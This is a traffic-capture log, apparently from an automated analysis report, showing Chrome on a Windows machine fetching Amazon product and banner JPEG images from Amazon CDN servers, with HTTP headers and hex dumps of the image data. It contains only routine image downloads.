                                                                                                                                                                                                        2024-08-15 13:38:05 UTC7620INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 05 06 07 08 02 03 04 01 09 01 01 00 01 05 00 00 00 00 00 00 00 00 00 00 00 00 00 04 01 02 03 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b9 60 00 00 11 c1 23 f9 4d da 65 ca 8e
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"5`#Me


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        82192.168.2.44986218.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC461OUTGET /images/G/39/Associates/XCM_Manual_Coupons_DQC_44b7c125-ee97-441e-9257-50452eb12b8c._SY116_CB613590867_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC918INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 3037
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 3bef4b86-9279-4ba4-a607-06d64baf68c7
                                                                                                                                                                                                        Date: Sun, 07 Jul 2024 13:47:26 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Feb 2023 12:27:45 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-761,/images/G/39/Associates/XCM_Manual_Coupons_DQC_44b7c125-ee97-441e-9257-50452eb12b8c
                                                                                                                                                                                                        Expires: Sat, 02 Jul 2044 13:47:26 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-761 /images/G/39/Associates/XCM_Manual_Coupons_DQC_44b7c125-ee97-441e-9257-50452eb12b8c
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Via: 1.1 411234c039d8f1de63b7f2192e5e24d4.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 17504
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: rei1foK8YWHcDikpR-L62zo-ZYbkefe26FBulrWDQRbQrd_epBSFtw==
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC3037INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9f 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 06 01 02 04 05 07 03 08 09 10 00 02 02 01 02 04 03 05 03 08 0a 03 00 00 00 00 01 02 00 03 11 04 12 05 21 31 41 06 13 51 22 32 61 81 91 07 71 b1 14 15 16 23 42 52 72 d2 33 43 44 53
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1AQ"2aq#BRr3CDS


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        83192.168.2.44985918.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC378OUTGET /images/I/31Id2i6D-rL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC842INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 3410
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 880b28ce-4424-43e7-bde3-7460a9eb98ed
                                                                                                                                                                                                        Date: Mon, 12 Aug 2024 13:23:36 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 12 Mar 2024 07:22:19 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-720,/images/I/31Id2i6D-rL
                                                                                                                                                                                                        Expires: Sun, 07 Aug 2044 13:23:36 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-720 /images/I/31Id2i6D-rL
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 b03c46754456cd1729ff37c2faafd4ec.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 260069
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: acRnvL3YH-bublUMx0E7T1B0xLx_kYqVFOTitIk2-97IRU44p9ygvA==
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC3410INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 08 03 04 05 06 07 02 01 01 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 04 05 01 02 03 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 99 60 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4`


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        84192.168.2.44986018.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC378OUTGET /images/I/31EO3Wv+aeL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC840INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 3718
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 5eba9385-2a5e-4fc9-b806-8f1e05163d4c
                                                                                                                                                                                                        Date: Tue, 13 Aug 2024 14:40:41 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 31 Oct 2023 09:32:16 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-287,/images/I/31EO3Wv+aeL
                                                                                                                                                                                                        Expires: Mon, 08 Aug 2044 14:40:41 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-287 /images/I/31EO3Wv+aeL
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 3c2af29a416fc74eb3d104df3f808fdc.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 12429
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: ZbVscEG4rpKPreq-d3Wkf7_LUqsdyJPrf1gy4QD_ZfoszIdI2xvO-A==
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC3718INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 31 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 09 04 05 06 07 01 02 08 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f6 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"1X


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        85192.168.2.44986318.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC378OUTGET /images/I/31+4pNVeyCL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC842INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 5483
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: a336e581-7d89-435e-a598-e8d74aa47317
                                                                                                                                                                                                        Date: Mon, 05 Aug 2024 11:23:37 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 19 Feb 2024 12:42:05 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-208,/images/I/31+4pNVeyCL
                                                                                                                                                                                                        Expires: Sun, 31 Jul 2044 11:23:37 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-208 /images/I/31+4pNVeyCL
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 9f25aa45df27e50f380232059fde4c1a.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 872068
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: 3-nZznoRfMr4UbmfM8Fu1SQyQTT0f4d_VveqYermFnQvvw5yYqthVA==
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC5483INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 04 03 05 06 07 02 08 09 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ee 58 00 00 00 00 00 00 00 1f 0f af 9f 40
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4X@


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        86192.168.2.449864151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC725OUTGET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986213_UAE_Budget_Store_AE_xsite_bubbler_beauty_en_400x400_2X._CB644457596_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 48950
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 38c58625-c3ff-45a7-b56b-f623a6357ec1
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 17 Aug 2021 17:25:23 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sat, 16 Jan 2044 20:23:44 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:05 GMT
                                                                                                                                                                                                        Age: 167083
                                                                                                                                                                                                        X-Served-By: cache-iad-kcgs7200167-IAD, cache-ewr-kewr1740050-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 02 01 01 01 02 02 02 01 01 02 02 02 02 02 02 02 02 02 03 02 03 03 03 03 02 03 03 04 04 04 04 04 03 05 05 05 05 05 05 07 07 07 07 07 08 08 08 08 08 08 08 08 08 08 01 01 01 01 02 02 02 05 03 03 05 07 05 04 05 07 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 ff c2 00 11 08 01 90 01 90 03 01 11 00 02 11 01 03 11 01 ff c4 00 3b 00 01 00 01 04 03 01 01 01 00 00 00 00 00 00 00 00 00 08 06 07 09 0a 03 04 05 01 02 0b 01 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 08 05 06 07 09 02 03 04 01 0a ff da 00 0c 03 01 00 02 10 03 10 00 00 00 df e0 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIF;
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: aa 8f 95 9d d3 40 8e d7 b3 a0 47 d8 c3 97 71 f9 ac 19 72 00 00 00 00 00 00 00 00 6a 61 bb ad 26 ed 2d 24 f0 dc 92 b5 33 8d 23 db 49 b9 d4 8b ae 24 db 76 15 7b a1 3d e6 8d 2d f6 2d 0d b7 b3 fc fc 65 d8 81 20 72 e5 d4 ce 15 00 00 00 00 06 40 f6 7d 11 a4 14 9e c4 43 1e da bd 97 b6 0e 32 e5 90 00 00 00 00 00 00 00 03 52 5d da e9 3b 6a e9 27 8b 6f bd b1 95 ba 7f 7e 5c 8a 5d cf 0f ed dc 73 5c e8 4f 79 a3 f9 a5 6e 16 0c 67 42 2e 54 76 ca 82 93 57 db f4 fd 00 00 00 00 5f c9 35 89 b2 13 b4 28 85 d6 f2 77 e2 57 48 bb 02 f3 69 1e d0 00 00 00 00 00 00 00 03 51 cd db e9 2b 67 f9 3f 80 e6 4e 3c 94 7d 9e ae 55 47 9e a7 0a 68 f8 ca e0 68 47 78 cf af e7 cb b9 78 19 92 3c 2f 90 b6 f7 d6 7c b1 00 00 00 00 0f 4a af e2 cb 4e ee b5 fb 6b f0 ed f3 8d 4d 48 4d 60 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: @Gqrja&-$3#I$v{=--e r@}C2R];j'o~\]s\OyngB.TvW_5(wWHiQ+g?N<}UGhhGxx</|JNkMHM`
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 3b 0b bf 73 ed 27 6c 7c 7f 3c 7d 9d c4 9d f4 75 c3 29 6f 3d 0a a2 00 00 00 00 02 63 cf 68 e1 73 b2 f5 91 8e ad 55 cc 60 00 00 01 f3 eb 83 ea 81 d8 ce bb 7c 9a 3d 63 c8 a3 d7 fd 4c 47 97 28 f9 39 14 eb 48 5b 38 e8 79 e9 af ab 8b af 6d 8e d1 d2 86 2b 54 7d 7e be 95 4a 97 e7 e4 dc 51 83 4c cb 68 5c ec b3 40 cd 7d b1 90 64 4f 8a e2 c5 77 ce 1e d6 23 bb a4 ae aa e7 67 2f c4 37 cb d6 5c f0 c2 f7 dd 4f e4 ed ed f1 fb f7 e0 00 00 00 01 91 5d aa 43 9b b3 9b 2c 0c 4b 69 1f 60 3c 5e 7e c0 00 00 01 f3 e9 ea e8 e1 e3 f7 83 ab b7 f3 f7 e7 ef 97 cf cf 0e 5f 5f 3e 9f 41 f7 e3 eb e8 1f 47 c1 f3 eb e8 1f b7 df df c7 d3 ef c0 00 00 00 03 97 d1 d7 96 9d dc 6b fb d7 ae 53 b1 b1 a9 79 a7 68 70 5e 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 77 b3 a6 3c c9 3e da 21 60
                                                                                                                                                                                                        Data Ascii: ;s'l|<}u)o=chsU`|=cLG(9H[8ym+T}~JQLh\@}dOw#g/7\O]C,Ki`<^~__>AGkSyhp^Cw<>!`
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 3d 19 90 a7 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f ff c4 00 52 10 00 00 05 01 04 04 08 08 0a 06 08 06 03 00 00 00 01 02 03 04 05 06 00 07 11 12 13 14 15 21 08 10 22 30 31 32 52 54 16 20 23 33 40 41 42 51 34 35 43 50 53 61 62 71 73 74 17 24 36 37 72 81 18 25 26 27 55 60 75 85 38 46 47 57 64 65 84 91 b1 ff da 00 08 01 01 00 01 12 02 f4 35 a4 58 b7 f3 ae 88 51 0f 65 5a 96 38 9d 4c eb 59 4a af e8 99 ff 00 33 55 0f 87 aa 92 45 b0 d4 72 63 d0 72 96 db 7e 5b bc db c2 09 5e f3 8d 82 a3 93 0f 94 29 ac 5a a1 f0 75 92 4c f6 4e ab fa 56 7f cd 2a 96 38 fd 7c e8 d9 19 16 2e 3c d3 a2 18 47 d9 f9 8b a3 78 ee 00 f5 ba 9d 8e 6d 88 69 74 e7 0f 61 c5 50 e8 f8 83 64 8a 80 76 97
                                                                                                                                                                                                        Data Ascii: =R!"012RT #3@ABQ45CPSabqst$67r%&'U`u8FGWde5XQeZ8LYJ3UErcr~[^)ZuLNV*8|.<GxmitaPdv
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 05 df 1f a5 b2 62 6c 60 48 2a 91 dc a2 9e 72 49 41 12 0f 8f 13 20 31 ee 80 e3 e6 54 dc b9 40 40 c0 06 28 e2 53 6f 01 f1 aa 49 0d 1a 60 c5 21 e5 ab bd 7f 46 9a 51 34 61 e5 95 59 40 45 14 9b 2e 65 55 ba 6b df bb da 62 9b 5e 1a 4e 55 72 bc 55 ca a2 9a 17 a5 39 1d 57 42 4d b0 a7 4a e9 c3 97 ea 22 66 a5 a1 5e f8 3d 4c c3 c7 ca 94 c8 be 65 a5 d2 92 98 bc ea 3e 38 d2 85 94 90 55 89 dc 33 3a 48 9a ef 8d 9e 8a a7 4f 80 86 64 37 71 ba 51 f7 84 55 7a a4 32 91 ec 4a 57 86 5e 52 85 07 46 a8 2b 37 0f da 38 66 f5 64 e2 81 ca 6b 13 59 76 d1 a7 b0 5f 2a bd aa c5 8e 8c 5b 18 94 07 23 a9 43 00 8d 92 48 88 24 9a 29 17 2a 48 94 0a 99 79 8a 6e 43 48 98 b1 54 79 69 6f 43 c6 70 b9 1b 22 a2 ea 75 12 0c 46 ce 57 3b a5 d5 70 a7 5d 51 c4 7d 1a f8 26 66 e4 2f 3a 16 8c 19 65 da 53 82
                                                                                                                                                                                                        Data Ascii: bl`H*rIA 1T@@(SoI`!FQ4aY@E.eUkb^NUrU9WBMJ"f^=Le>8U3:HOd7qQUz2JW^RF+78fdkYv_*[#CH$)*HynCHTyioCp"uFW;p]Q}&f/:eS
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 21 12 09 b1 e5 14 e9 7b b7 5b a1 34 83 dc 03 e3 5e 10 87 e9 d6 17 1f f0 9c 40 b0 7e 49 b1 0c 70 d1 e8 ca 02 60 8e 51 21 03 14 0f d4 eb 5a 49 cf 95 45 22 1c 52 4c 71 cc 66 8e 93 70 dd 45 12 c4 00 bd 25 9a 5c ca 05 32 43 1b 36 8e 69 72 92 c0 02 22 00 1d 23 d1 68 3a 76 a0 65 5e 55 97 94 fd 46 b2 d4 da 8b 48 b8 97 96 8e 9a 2c fa b7 93 3d 2c ed 46 f2 53 24 49 52 13 82 eb 52 19 e5 e4 4a 01 f4 ba 57 48 24 92 9c f5 2e a6 0f 16 4f d4 a2 76 a8 0f 9a 55 c7 d8 c8 1e 81 bb 44 90 0f 47 b5 60 22 1d 26 c0 77 ee 05 0e d4 37 e1 8e fe 8c c0 62 97 01 c7 26 e3 78 d5 83 d1 4a fd 1b c7 68 13 58 92 50 c8 67 3c 58 0a 60 06 4c d9 54 26 f2 1d bb 34 ce 5c ce 07 48 a1 7a 87 64 b2 cd d7 d1 b8 81 57 59 38 67 d6 9a 0b 83 aa e8 4e 89 d3 2a 9d 6b 54 68 ea ea d1 58 0f c2 a4 d6 54 6d 5b cb
                                                                                                                                                                                                        Data Ascii: !{[4^@~Ip`Q!ZIE"RLqfpE%\2C6ir"#h:ve^UFH,=,FS$IRRJWH$.OvUDG`"&w7b&xJhXPg<X`LT&4\HzdWY8gN*kThXTm[
